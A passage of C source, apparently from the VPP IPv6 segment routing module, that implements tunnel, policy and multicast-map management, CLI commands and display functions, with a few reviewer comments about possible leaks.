      for (i = 0; i < vec_len (sm->hmac_keys); i++)
	{
	  if (sm->hmac_keys[i].shared_secret == 0)
	    {
	      key = sm->hmac_keys + i;
	      goto found;
	    }
	}
      vec_validate (sm->hmac_keys, i);
      key = sm->hmac_keys + i;
    found:;
    }

  /* Store a private copy of the secret and index it for future lookups */
  key->shared_secret = vec_dup (secret);

  hash_set_mem (sm->hmac_key_by_shared_secret, key->shared_secret,
		key - sm->hmac_keys);

  if (indexp)
    *indexp = key - sm->hmac_keys;
  return (key);
}

/**
 * @brief Add or Delete a Segment Routing tunnel.
* * @param a ip6_sr_add_del_tunnel_args_t * * * @return retval int */ int ip6_sr_add_del_tunnel (ip6_sr_add_del_tunnel_args_t * a) { ip6_main_t *im = &ip6_main; ip6_sr_tunnel_key_t key; ip6_sr_tunnel_t *t; uword *p, *n; ip6_sr_header_t *h = 0; u32 header_length; ip6_address_t *addrp, *this_address; ip6_sr_main_t *sm = &sr_main; u8 *key_copy; u32 rx_fib_index, tx_fib_index; u32 hmac_key_index_u32; u8 hmac_key_index = 0; ip6_sr_policy_t *pt; int i; dpo_id_t dpo = DPO_NULL; /* Make sure that the rx FIB exists */ p = hash_get (im->fib_index_by_table_id, a->rx_table_id); if (p == 0) return -3; /* remember the FIB index */ rx_fib_index = p[0]; /* Make sure that the supplied FIB exists */ p = hash_get (im->fib_index_by_table_id, a->tx_table_id); if (p == 0) return -4; /* remember the FIB index */ tx_fib_index = p[0]; clib_memcpy (key.src.as_u8, a->src_address->as_u8, sizeof (key.src)); clib_memcpy (key.dst.as_u8, a->dst_address->as_u8, sizeof (key.dst)); /* When adding a tunnel: * - If a "name" is given, it must not exist. * - The "key" is always checked, and must not exist. * When deleting a tunnel: * - If the "name" is given, and it exists, then use it. * - If the "name" is not given, use the "key". * - If the "name" and the "key" are given, then both must point to the same * thing. 
*/ /* Lookup the key */ p = hash_get_mem (sm->tunnel_index_by_key, &key); /* If the name is given, look it up */ if (a->name) n = hash_get_mem (sm->tunnel_index_by_name, a->name); else n = 0; /* validate key/name parameters */ if (!a->is_del) /* adding a tunnel */ { if (a->name && n) /* name given & exists already */ return -1; if (p) /* key exists already */ return -1; } else /* deleting a tunnel */ { if (!p) /* key doesn't exist */ return -2; if (a->name && !n) /* name given & it doesn't exist */ return -2; if (n) /* name given & found */ { if (n[0] != p[0]) /* name and key do not point to the same thing */ return -2; } } if (a->is_del) /* delete the tunnel */ { hash_pair_t *hp; /* Delete existing tunnel */ t = pool_elt_at_index (sm->tunnels, p[0]); ip6_delete_route_no_next_hop (&t->key.dst, t->dst_mask_width, a->rx_table_id); vec_free (t->rewrite); /* Remove tunnel from any policy if associated */ if (t->policy_index != ~0) { pt = pool_elt_at_index (sm->policies, t->policy_index); for (i = 0; i < vec_len (pt->tunnel_indices); i++) { if (pt->tunnel_indices[i] == t - sm->tunnels) { vec_delete (pt->tunnel_indices, 1, i); goto found; } } clib_warning ("Tunnel index %d not found in policy_index %d", t - sm->tunnels, pt - sm->policies); found: /* If this is last tunnel in the policy, clean up the policy too */ if (vec_len (pt->tunnel_indices) == 0) { hash_unset_mem (sm->policy_index_by_policy_name, pt->name); vec_free (pt->name); pool_put (sm->policies, pt); } } /* Clean up the tunnel by name */ if (t->name) { hash_unset_mem (sm->tunnel_index_by_name, t->name); vec_free (t->name); } pool_put (sm->tunnels, t); hp = hash_get_pair (sm->tunnel_index_by_key, &key); key_copy = (void *) (hp->key); hash_unset_mem (sm->tunnel_index_by_key, &key); vec_free (key_copy); return 0; } /* create a new tunnel */ pool_get (sm->tunnels, t); memset (t, 0, sizeof (*t)); t->policy_index = ~0; clib_memcpy (&t->key, &key, sizeof (t->key)); t->dst_mask_width = a->dst_mask_width; 
t->rx_fib_index = rx_fib_index; t->tx_fib_index = tx_fib_index; if (!vec_len (a->segments)) /* there must be at least one segment... */ return -4; /* The first specified hop goes right into the dst address */ clib_memcpy (&t->first_hop, &a->segments[0], sizeof (ip6_address_t)); /* * Create the sr header rewrite string * The list of segments needs an extra slot for the ultimate destination * which is taken from the packet we add the SRH to. */ header_length = sizeof (*h) + sizeof (ip6_address_t) * (vec_len (a->segments) + 1 + vec_len (a->tags)); if (a->shared_secret) { /* Allocate a new key slot if we don't find the secret key */ hmac_key_index_u32 = 0; (void) find_or_add_shared_secret (sm, a->shared_secret, &hmac_key_index_u32); /* Hey Vinz Clortho: Gozzer is pissed.. you're out of keys! */ if (hmac_key_index_u32 >= 256) return -5; hmac_key_index = hmac_key_index_u32; header_length += SHA256_DIGEST_LENGTH; } vec_validate (t->rewrite, header_length - 1); h = (ip6_sr_header_t *) t->rewrite; h->protocol = 0xFF; /* we don't know yet */ h->length = (header_length / 8) - 1; h->type = ROUTING_HEADER_TYPE_SR; /* first_segment and segments_left need to have the index of the last * element in the list; a->segments has one element less than ends up * in the header (it does not have the DA in it), so vec_len(a->segments) * is the value we want. */ h->first_segment = h->segments_left = vec_len (a->segments); if (a->shared_secret) h->hmac_key = hmac_key_index & 0xFF; h->flags = a->flags_net_byte_order; /* Paint on the segment list, in reverse. * This is offset by one to leave room at the start for the ultimate * destination. */ addrp = h->segments + vec_len (a->segments); vec_foreach (this_address, a->segments) { clib_memcpy (addrp->as_u8, this_address->as_u8, sizeof (ip6_address_t)); addrp--; } /* * Since the ultimate destination address is not yet known, set that slot * to a value we will instantly recognize as bogus. 
*/ memset (h->segments, 0xfe, sizeof (ip6_address_t)); /* Paint on the tag list, not reversed */ addrp = h->segments + vec_len (a->segments); vec_foreach (this_address, a->tags) { clib_memcpy (addrp->as_u8, this_address->as_u8, sizeof (ip6_address_t)); addrp++; } key_copy = vec_new (ip6_sr_tunnel_key_t, 1); clib_memcpy (key_copy, &key, sizeof (ip6_sr_tunnel_key_t)); hash_set_mem (sm->tunnel_index_by_key, key_copy, t - sm->tunnels); /* * Stick the tunnel index into the rewrite header. * * Unfortunately, inserting an SR header according to the various * RFC's requires parsing through the ip6 header, perhaps consing a * buffer onto the head of the vlib_buffer_t, etc. We don't use the * normal reverse bcopy rewrite code. * * We don't handle ugly RFC-related cases yet, but I'm sure PL will complain * at some point... */ dpo_set (&dpo, sr_dpo_type, DPO_PROTO_IP6, t - sm->tunnels); fib_prefix_t pfx = { .fp_proto = FIB_PROTOCOL_IP6, .fp_len = a->dst_mask_width, .fp_addr = { .ip6 = *a->dst_address, } }; fib_table_entry_special_dpo_add (rx_fib_index, &pfx, FIB_SOURCE_SR, FIB_ENTRY_FLAG_EXCLUSIVE, &dpo); dpo_reset (&dpo); if (a->policy_name) { p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name); if (p) { pt = pool_elt_at_index (sm->policies, p[0]); } else /* no policy, lets create one */ { pool_get (sm->policies, pt); memset (pt, 0, sizeof (*pt)); pt->name = format (0, "%s%c", a->policy_name, 0); hash_set_mem (sm->policy_index_by_policy_name, pt->name, pt - sm->policies); p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name); } vec_add1 (pt->tunnel_indices, t - sm->tunnels); if (p == 0) clib_warning ("p is NULL!"); t->policy_index = p ? p[0] : ~0; /* equiv. to (pt - sm->policies) */ } if (a->name) { t->name = format (0, "%s%c", a->name, 0); hash_set_mem (sm->tunnel_index_by_name, t->name, t - sm->tunnels); } return 0; } /** * @brief no-op lock function. 
* The lifetime of the SR entry is managed by the control plane
 */
static void
sr_dpo_lock (dpo_id_t * dpo)
{
}

/**
 * @brief no-op unlock function.
 * The lifetime of the SR entry is managed by the control plane
 */
static void
sr_dpo_unlock (dpo_id_t * dpo)
{
}

/* Format helper for the SR DPO: prints the tunnel pool index */
u8 *
format_sr_dpo (u8 * s, va_list * args)
{
  index_t index = va_arg (*args, index_t);
  CLIB_UNUSED (u32 indent) = va_arg (*args, u32);

  return (format (s, "SR: tunnel:[%d]", index));
}

/* Virtual function table registered for the SR DPO type */
const static dpo_vft_t sr_vft = {
  .dv_lock = sr_dpo_lock,
  .dv_unlock = sr_dpo_unlock,
  .dv_format = format_sr_dpo,
};

/* Graph nodes that consume packets forwarded via the SR DPO (per-protocol) */
const static char *const sr_ip6_nodes[] = {
  "sr-rewrite",
  NULL,
};

const static char *const *const sr_nodes[DPO_PROTO_NUM] = {
  [DPO_PROTO_IP6] = sr_ip6_nodes,
};

/**
 * @brief CLI parser for Add or Delete a Segment Routing tunnel.
 *
 * Parses "sr tunnel ..." arguments into ip6_sr_add_del_tunnel_args_t and
 * calls ip6_sr_add_del_tunnel, mapping its return codes to CLI errors.
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
sr_add_del_tunnel_command_fn (vlib_main_t * vm,
			      unformat_input_t * input,
			      vlib_cli_command_t * cmd)
{
  int is_del = 0;
  ip6_address_t src_address;
  int src_address_set = 0;
  ip6_address_t dst_address;
  u32 dst_mask_width;
  int dst_address_set = 0;
  u16 flags = 0;
  u8 *shared_secret = 0;
  u8 *name = 0;
  u8 *policy_name = 0;
  u32 rx_table_id = 0;		/* default: table 0 */
  u32 tx_table_id = 0;
  ip6_address_t *segments = 0;
  ip6_address_t *this_seg;
  ip6_address_t *tags = 0;
  ip6_address_t *this_tag;
  ip6_sr_add_del_tunnel_args_t _a, *a = &_a;
  ip6_address_t next_address, tag;
  int pl_index;
  int rv;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "del"))
	is_del = 1;
      else if (unformat (input, "rx-fib-id %d", &rx_table_id))
	;
      else if (unformat (input, "tx-fib-id %d", &tx_table_id))
	;
      else if (unformat (input, "src %U", unformat_ip6_address, &src_address))
	src_address_set = 1;
      else if (unformat (input, "name %s", &name))
	;
      else if (unformat (input, "policy %s", &policy_name))
	;
      else if (unformat (input, "dst %U/%d",
			 unformat_ip6_address, &dst_address, &dst_mask_width))
	dst_address_set = 1;
      else if (unformat (input, "next %U", unformat_ip6_address,
			 &next_address))
	{
	  /* "next" may repeat; each hop is appended to the segment list */
	  vec_add2 (segments, this_seg, 1);
	  clib_memcpy (this_seg->as_u8, next_address.as_u8,
		       sizeof (*this_seg));
	}
      else if (unformat (input, "tag %U", unformat_ip6_address, &tag))
	{
	  vec_add2 (tags, this_tag, 1);
	  clib_memcpy (this_tag->as_u8, tag.as_u8, sizeof (*this_tag));
	}
      else if (unformat (input, "clean"))
	flags |= IP6_SR_HEADER_FLAG_CLEANUP;
      else if (unformat (input, "protected"))
	flags |= IP6_SR_HEADER_FLAG_PROTECTED;
      else if (unformat (input, "key %s", &shared_secret))
	/* Do not include the trailing NULL byte. Guaranteed interop issue */
	_vec_len (shared_secret) -= 1;
      else if (unformat (input, "InPE %d", &pl_index))
	{
	  if (pl_index <= 0 || pl_index > 4)
	    {
	    pl_index_range_error:
	      return clib_error_return
		(0, "Policy List Element Index %d out of range (1-4)",
		 pl_index);
	    }
	  flags |= IP6_SR_HEADER_FLAG_PL_ELT_INGRESS_PE
	    << ip6_sr_policy_list_shift_from_index (pl_index);
	}
      else if (unformat (input, "EgPE %d", &pl_index))
	{
	  if (pl_index <= 0 || pl_index > 4)
	    goto pl_index_range_error;
	  flags |= IP6_SR_HEADER_FLAG_PL_ELT_EGRESS_PE
	    << ip6_sr_policy_list_shift_from_index (pl_index);
	}
      else if (unformat (input, "OrgSrc %d", &pl_index))
	{
	  if (pl_index <= 0 || pl_index > 4)
	    goto pl_index_range_error;
	  flags |= IP6_SR_HEADER_FLAG_PL_ELT_ORIG_SRC_ADDR
	    << ip6_sr_policy_list_shift_from_index (pl_index);
	}
      else
	break;
    }

  if (!src_address_set)
    return clib_error_return (0, "src address required");

  if (!dst_address_set)
    return clib_error_return (0, "dst address required");

  if (!segments)
    return clib_error_return (0, "at least one sr segment required");

  memset (a, 0, sizeof (*a));
  a->src_address = &src_address;
  a->dst_address = &dst_address;
  a->dst_mask_width = dst_mask_width;
  a->segments = segments;
  a->tags = tags;
  a->flags_net_byte_order = clib_host_to_net_u16 (flags);
  a->is_del = is_del;
  a->rx_table_id = rx_table_id;
  a->tx_table_id = tx_table_id;
  a->shared_secret = shared_secret;

  if (vec_len (name))
    a->name = name;
  else
    a->name = 0;

  if (vec_len (policy_name))
    a->policy_name = policy_name;
  else
    a->policy_name = 0;

  rv = ip6_sr_add_del_tunnel (a);

  /* name/policy_name vectors are retained by the tunnel on success;
     the scratch vectors below are always ours to free */
  vec_free (segments);
  vec_free (tags);
  vec_free (shared_secret);

  switch (rv)
    {
    case 0:
      break;
    case -1:
      return clib_error_return (0, "SR tunnel src %U dst %U already exists",
				format_ip6_address, &src_address,
				format_ip6_address, &dst_address);
    case -2:
      return clib_error_return (0, "SR tunnel src %U dst %U does not exist",
				format_ip6_address, &src_address,
				format_ip6_address, &dst_address);
    case -3:
      return clib_error_return (0, "FIB table %d does not exist",
				rx_table_id);
    case -4:
      return clib_error_return (0, "At least one segment is required");
    default:
      return clib_error_return (0, "BUG: ip6_sr_add_del_tunnel returns %d",
				rv);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (sr_tunnel_command, static) = {
  .path = "sr tunnel",
  .short_help =
    "sr tunnel [del] [name <name>] src <addr> dst <addr> [next <addr>] "
    "[clean] [reroute] [key <secret>] [policy <policy_name>]"
    "[rx-fib-id <fib_id>] [tx-fib-id <fib_id>]",
  .function = sr_add_del_tunnel_command_fn,
};
/* *INDENT-ON* */

/**
 * @brief Display Segment Routing tunnel
 *
 * Prints one tunnel: name, src/dst/first-hop, fib ids, rewrite SRH and
 * (if attached) the owning policy name.
 *
 * @param vm vlib_main_t *
 * @param t ip6_sr_tunnel_t *
 */
void
ip6_sr_tunnel_display (vlib_main_t * vm, ip6_sr_tunnel_t * t)
{
  ip6_sr_main_t *sm = &sr_main;
  ip6_fib_t *rx_fib, *tx_fib;
  ip6_sr_policy_t *pt;

  rx_fib = ip6_fib_get (t->rx_fib_index);
  tx_fib = ip6_fib_get (t->tx_fib_index);

  if (t->name)
    vlib_cli_output (vm, "sr tunnel name: %s", (char *) t->name);

  vlib_cli_output (vm, "src %U dst %U first hop %U",
		   format_ip6_address, &t->key.src,
		   format_ip6_address, &t->key.dst,
		   format_ip6_address, &t->first_hop);
  vlib_cli_output (vm, " rx-fib-id %d tx-fib-id %d",
		   rx_fib->table_id, tx_fib->table_id);
  vlib_cli_output (vm, " sr: %U", format_ip6_sr_header, t->rewrite,
		   0 /* print_hmac */ );

  if (t->policy_index != ~0)
    {
      pt = pool_elt_at_index (sm->policies, t->policy_index);
      vlib_cli_output (vm, "sr policy: %s", (char *) pt->name);
    }
  vlib_cli_output (vm, "-------");

  return;
}

/**
 * @brief CLI Parser for Display Segment Routing tunnel
 *
 * "show sr tunnel [name <x>]" - shows the named tunnel, or all tunnels.
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
show_sr_tunnel_fn (vlib_main_t * vm,
		   unformat_input_t * input, vlib_cli_command_t * cmd)
{
  /* static: scratch vector reused (and kept allocated) across invocations */
  static ip6_sr_tunnel_t **tunnels;
  ip6_sr_tunnel_t *t;
  ip6_sr_main_t *sm = &sr_main;
  int i;
  uword *p = 0;
  u8 *name = 0;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "name %s", &name))
	{
	  p = hash_get_mem (sm->tunnel_index_by_name, name);
	  if (!p)
	    vlib_cli_output (vm, "No SR tunnel with name: %s. Showing all.",
			     name);
	}
      else
	break;
    }

  /* NOTE(review): the "name" vector parsed above is never vec_free'd -
     small per-invocation leak; confirm before changing */

  vec_reset_length (tunnels);

  if (!p)			/* Either name parm not passed or no tunnel with that name found, show all */
    {
      /* *INDENT-OFF* */
      pool_foreach (t, sm->tunnels,
      ({
        vec_add1 (tunnels, t);
      }));
      /* *INDENT-ON* */
    }
  else				/* Just show the one tunnel by name */
    vec_add1 (tunnels, &sm->tunnels[p[0]]);

  if (vec_len (tunnels) == 0)
    vlib_cli_output (vm, "No SR tunnels configured");

  for (i = 0; i < vec_len (tunnels); i++)
    {
      t = tunnels[i];
      ip6_sr_tunnel_display (vm, t);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (show_sr_tunnel_command, static) = {
  .path = "show sr tunnel",
  .short_help = "show sr tunnel [name <sr-tunnel-name>]",
  .function = show_sr_tunnel_fn,
};
/* *INDENT-ON* */

/**
 * @brief Add or Delete a Segment Routing policy
 *
 * A policy is a named group of existing tunnels; each member tunnel's
 * policy_index is pointed back at the policy.
 *
 * @param a ip6_sr_add_del_policy_args_t *
 *
 * @return retval int
 */
int
ip6_sr_add_del_policy (ip6_sr_add_del_policy_args_t * a)
{
  ip6_sr_main_t *sm = &sr_main;
  uword *p;
  ip6_sr_tunnel_t *t = 0;
  ip6_sr_policy_t *policy;
  u32 *tunnel_indices = 0;
  int i;

  if (a->is_del)
    {
      p = hash_get_mem (sm->policy_index_by_policy_name, a->name);
      if (!p)
	return -6;		/* policy name not found */

      policy = pool_elt_at_index (sm->policies, p[0]);

      /* Detach every member tunnel before reclaiming the policy */
      vec_foreach_index (i, policy->tunnel_indices)
      {
	t =
pool_elt_at_index (sm->tunnels, policy->tunnel_indices[i]);
	t->policy_index = ~0;
      }

      hash_unset_mem (sm->policy_index_by_policy_name, a->name);
      pool_put (sm->policies, policy);
      return 0;
    }

  if (!vec_len (a->tunnel_names))
    return -3;			/*tunnel name is required case */

  vec_reset_length (tunnel_indices);

  /* Check tunnel names, add tunnel_index to policy */
  for (i = 0; i < vec_len (a->tunnel_names); i++)
    {
      p = hash_get_mem (sm->tunnel_index_by_name, a->tunnel_names[i]);
      if (!p)
	return -4;		/* tunnel name not found case */

      t = pool_elt_at_index (sm->tunnels, p[0]);
      /*
         No need to check t==0. -3 condition above ensures name
       */
      if (t->policy_index != ~0)
	return -5;		/* tunnel name already associated with a policy */

      /* Add to tunnel indicies */
      vec_add1 (tunnel_indices, p[0]);
    }

  /* Add policy to ip6_sr_main_t; policy takes ownership of a->name */
  pool_get (sm->policies, policy);
  policy->name = a->name;
  policy->tunnel_indices = tunnel_indices;
  hash_set_mem (sm->policy_index_by_policy_name, policy->name,
		policy - sm->policies);

  /* Yes, this could be construed as overkill but the last thing you should
     do is set the policy_index on the tunnel after everything is set in
     ip6_sr_main_t.  If this is deemed overly cautious, could set this in
     the vec_len(tunnel_names) loop.
   */
  for (i = 0; i < vec_len (policy->tunnel_indices); i++)
    {
      t = pool_elt_at_index (sm->tunnels, policy->tunnel_indices[i]);
      t->policy_index = policy - sm->policies;
    }

  return 0;
}

/**
 * @brief CLI Parser for Add or Delete a Segment Routing policy
 *
 * "sr policy [del] name <x> tunnel <t> [tunnel <t>]*"
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
sr_add_del_policy_command_fn (vlib_main_t * vm,
			      unformat_input_t * input,
			      vlib_cli_command_t * cmd)
{
  int is_del = 0;
  u8 **tunnel_names = 0;	/* vector of name vectors */
  u8 *tunnel_name = 0;
  u8 *name = 0;
  ip6_sr_add_del_policy_args_t _a, *a = &_a;
  int rv;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "del"))
	is_del = 1;
      else if (unformat (input, "name %s", &name))
	;
      else if (unformat (input, "tunnel %s", &tunnel_name))
	{
	  if (tunnel_name)
	    {
	      vec_add1 (tunnel_names, tunnel_name);
	      tunnel_name = 0;	/* ownership moved into tunnel_names */
	    }
	}
      else
	break;
    }

  if (!name)
    return clib_error_return (0, "name of SR policy required");

  memset (a, 0, sizeof (*a));

  a->is_del = is_del;
  a->name = name;
  a->tunnel_names = tunnel_names;

  rv = ip6_sr_add_del_policy (a);

  /* NOTE(review): frees the outer vector only, not the individual name
     vectors it holds; confirm intent before changing */
  vec_free (tunnel_names);

  switch (rv)
    {
    case 0:
      break;
    case -3:
      return clib_error_return (0,
				"tunnel name to associate to SR policy is required");
    case -4:
      return clib_error_return (0, "tunnel name not found");
    case -5:
      return clib_error_return (0, "tunnel already associated with policy");
    case -6:
      return clib_error_return (0, "policy name %s not found", name);
    case -7:
      return clib_error_return (0, "TODO: deleting policy name %s", name);
    default:
      return clib_error_return (0, "BUG: ip6_sr_add_del_policy returns %d",
				rv);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (sr_policy_command, static) = {
  .path = "sr policy",
  .short_help =
  "sr policy [del] name <policy-name> tunnel <sr-tunnel-name> [tunnel <sr-tunnel-name>]*",
  .function = sr_add_del_policy_command_fn,
};
/* *INDENT-ON* */

/**
 * @brief CLI Parser for Displaying Segment Routing policy
 *
 * "show sr policy [name <x>]" - shows the named policy, or all policies,
 * with each member tunnel displayed in full.
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
show_sr_policy_fn (vlib_main_t * vm,
		   unformat_input_t * input, vlib_cli_command_t * cmd)
{
  /* static: scratch vector reused across invocations */
  static ip6_sr_policy_t **policies;
  ip6_sr_policy_t *policy;
  ip6_sr_tunnel_t *t;
  ip6_sr_main_t *sm = &sr_main;
  int i, j;
  uword *p = 0;
  u8 *name = 0;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "name %s", &name))
	{
	  p = hash_get_mem (sm->policy_index_by_policy_name, name);
	  if (!p)
	    vlib_cli_output (vm,
			     "policy with name %s not found. Showing all.",
			     name);
	}
      else
	break;
    }

  vec_reset_length (policies);

  if (!p)			/* Either name parm not passed or no policy with that name found, show all */
    {
      /* *INDENT-OFF* */
      pool_foreach (policy, sm->policies,
      ({
        vec_add1 (policies, policy);
      }));
      /* *INDENT-ON* */
    }
  else				/* Just show the one policy by name and a summary of tunnel names */
    {
      policy = pool_elt_at_index (sm->policies, p[0]);
      vec_add1 (policies, policy);
    }

  if (vec_len (policies) == 0)
    vlib_cli_output (vm, "No SR policies configured");

  for (i = 0; i < vec_len (policies); i++)
    {
      policy = policies[i];

      if (policy->name)
	vlib_cli_output (vm, "SR policy name: %s", (char *) policy->name);

      for (j = 0; j < vec_len (policy->tunnel_indices); j++)
	{
	  t = pool_elt_at_index (sm->tunnels, policy->tunnel_indices[j]);
	  ip6_sr_tunnel_display (vm, t);
	}
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (show_sr_policy_command, static) = {
  .path = "show sr policy",
  .short_help = "show sr policy [name <sr-policy-name>]",
  .function = show_sr_policy_fn,
};
/* *INDENT-ON* */

/**
 * @brief Add or Delete a mapping of IP6 multicast address
 * to Segment Routing policy.
 *
 * @param a ip6_sr_add_del_multicastmap_args_t *
 *
 * @return retval int (0 ok, -1 address/policy not found)
 */
int
ip6_sr_add_del_multicastmap (ip6_sr_add_del_multicastmap_args_t * a)
{
  uword *p;
  ip6_sr_tunnel_t *t;
  ip6_sr_main_t *sm = &sr_main;
  ip6_sr_policy_t *pt;

  if (a->is_del)
    {
      /* clean up the adjacency */
      p = hash_get_mem (sm->policy_index_by_multicast_address,
			a->multicast_address);
    }
  else
    {
      /* Get our policy by policy_name */
      p = hash_get_mem (sm->policy_index_by_policy_name, a->policy_name);
    }
  if (!p)
    return -1;

  pt = pool_elt_at_index (sm->policies, p[0]);

  /*
     Get the first tunnel associated with policy populate the fib adjacency.
     From there, since this tunnel will have it's policy_index != ~0 it will
     be the trigger in the dual_loop to pull up the policy and make a
     copy-rewrite for each tunnel in the policy
   */
  t = pool_elt_at_index (sm->tunnels, pt->tunnel_indices[0]);

  /*
   * Stick the tunnel index into the rewrite header.
   *
   * Unfortunately, inserting an SR header according to the various
   * RFC's requires parsing through the ip6 header, perhaps consing a
   * buffer onto the head of the vlib_buffer_t, etc. We don't use the
   * normal reverse bcopy rewrite code.
   *
   * We don't handle ugly RFC-related cases yet, but I'm sure PL will complain
   * at some point...
   */
  dpo_id_t dpo = DPO_NULL;

  dpo_set (&dpo, sr_dpo_type, DPO_PROTO_IP6, t - sm->tunnels);

  /* Construct a FIB entry for multicast using the rx/tx fib from the
     first tunnel.
     NOTE(review): this special-dpo ADD runs on the delete path too (the
     is_del branch below only removes the hash entry) - looks like the FIB
     entry is never deleted; confirm against the replicate/multicast design
     before changing. */
  fib_prefix_t pfx = {
    .fp_proto = FIB_PROTOCOL_IP6,
    .fp_len = 128,
    .fp_addr = {
		.ip6 = *a->multicast_address,
		}
  };
  fib_table_entry_special_dpo_add (t->rx_fib_index, &pfx, FIB_SOURCE_SR,
				   FIB_ENTRY_FLAG_EXCLUSIVE, &dpo);
  dpo_reset (&dpo);

  /* Heap-allocated copy of the address: the hash stores the pointer as key */
  u8 *mcast_copy = 0;
  mcast_copy = vec_new (ip6_address_t, 1);
  memcpy (mcast_copy, a->multicast_address, sizeof (ip6_address_t));

  if (a->is_del)
    {
      hash_unset_mem (sm->policy_index_by_multicast_address, mcast_copy);
      vec_free (mcast_copy);
      return 0;
    }
  /* else */

  hash_set_mem (sm->policy_index_by_multicast_address, mcast_copy,
		pt - sm->policies);

  return 0;
}

/**
 * @brief CLI Parser for Adding or Delete a mapping of IP6 multicast address
 * to Segment Routing policy.
 *
 * "sr multicast-map address <ip6> sr-policy <name> [del]"
 * Only usable when built with DPDK (replicate support).
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
sr_add_del_multicast_map_command_fn (vlib_main_t * vm,
				     unformat_input_t * input,
				     vlib_cli_command_t * cmd)
{
  int is_del = 0;
  ip6_address_t multicast_address;
  u8 *policy_name = 0;
  int multicast_address_set = 0;
  ip6_sr_add_del_multicastmap_args_t _a, *a = &_a;
  int rv;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "del"))
	is_del = 1;
      else
	if (unformat
	    (input, "address %U", unformat_ip6_address, &multicast_address))
	multicast_address_set = 1;
      else if (unformat (input, "sr-policy %s", &policy_name))
	;
      else
	break;
    }

  if (!is_del && !policy_name)
    return clib_error_return (0, "name of sr policy required");

  if (!multicast_address_set)
    return clib_error_return (0, "multicast address required");

  memset (a, 0, sizeof (*a));

  a->is_del = is_del;
  a->multicast_address = &multicast_address;
  a->policy_name = policy_name;

#if DPDK > 0			/*Cannot call replicate or configure multicast map yet without DPDK */
  rv = ip6_sr_add_del_multicastmap (a);
#else
  /* Non-DPDK builds bail out here, so rv below is only reached when set */
  return clib_error_return (0,
			    "cannot use multicast replicate spray case without DPDK installed");
#endif /* DPDK */

  switch (rv)
    {
    case 0:
      break;
    case -1:
      return clib_error_return (0, "no policy with name: %s", policy_name);

    case -2:
      return clib_error_return (0, "multicast map someting ");

    case -3:
      return clib_error_return (0,
				"tunnel name to associate to SR policy is required");

    case -7:
      return clib_error_return (0, "TODO: deleting policy name %s",
				policy_name);

    default:
      return clib_error_return (0, "BUG: ip6_sr_add_del_policy returns %d",
				rv);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (sr_multicast_map_command, static) = {
  .path = "sr multicast-map",
  .short_help =
  "sr multicast-map address <multicast-ip6-address> sr-policy <sr-policy-name> [del]",
  .function = sr_add_del_multicast_map_command_fn,
};
/* *INDENT-ON* */

/**
 * @brief CLI Parser for Displaying a mapping of IP6 multicast address
 * to Segment Routing policy.
 *
 * Walks policy_index_by_multicast_address and prints each mapping.
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
show_sr_multicast_map_fn (vlib_main_t * vm,
			  unformat_input_t * input, vlib_cli_command_t * cmd)
{
  ip6_sr_main_t *sm = &sr_main;
  u8 *key = 0;
  u32 value;
  ip6_address_t multicast_address;
  ip6_sr_policy_t *pt;

  /* pull all entries from the hash table into vector for display */

  /* *INDENT-OFF* */
  hash_foreach_mem (key, value, sm->policy_index_by_multicast_address,
  ({
    if (!key)
        vlib_cli_output (vm, "no multicast maps configured");
    else
      {
        multicast_address = *((ip6_address_t *)key);
        pt = pool_elt_at_index (sm->policies, value);
        if (pt)
          {
            vlib_cli_output (vm, "address: %U policy: %s",
                             format_ip6_address, &multicast_address,
                             pt->name);
          }
        else
          vlib_cli_output (vm, "BUG: policy not found for address: %U with policy index %d",
                             format_ip6_address, &multicast_address,
                             value);
      }
  }));
  /* *INDENT-ON* */

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (show_sr_multicast_map_command, static) = {
  .path
= "show sr multicast-map",
  .short_help = "show sr multicast-map",
  .function = show_sr_multicast_map_fn,
};
/* *INDENT-ON* */


#define foreach_sr_fix_dst_addr_next \
_(DROP, "error-drop")

/**
 * @brief Struct for valid next-nodes for SR fix destination address node
 */
typedef enum
{
#define _(s,n) SR_FIX_DST_ADDR_NEXT_##s,
  foreach_sr_fix_dst_addr_next
#undef _
    SR_FIX_DST_ADDR_N_NEXT,
} sr_fix_dst_addr_next_t;

/**
 * @brief Error strings for SR Fix Destination rewrite
 */
static char *sr_fix_dst_error_strings[] = {
#define sr_fix_dst_error(n,s) s,
#include "sr_fix_dst_error.def"
#undef sr_fix_dst_error
};

/**
 * @brief Struct for errors for SR Fix Destination rewrite
 */
typedef enum
{
#define sr_fix_dst_error(n,s) SR_FIX_DST_ERROR_##n,
#include "sr_fix_dst_error.def"
#undef sr_fix_dst_error
  SR_FIX_DST_N_ERROR,
} sr_fix_dst_error_t;

/**
 * @brief Information for fix address trace
 */
typedef struct
{
  ip6_address_t src, dst;
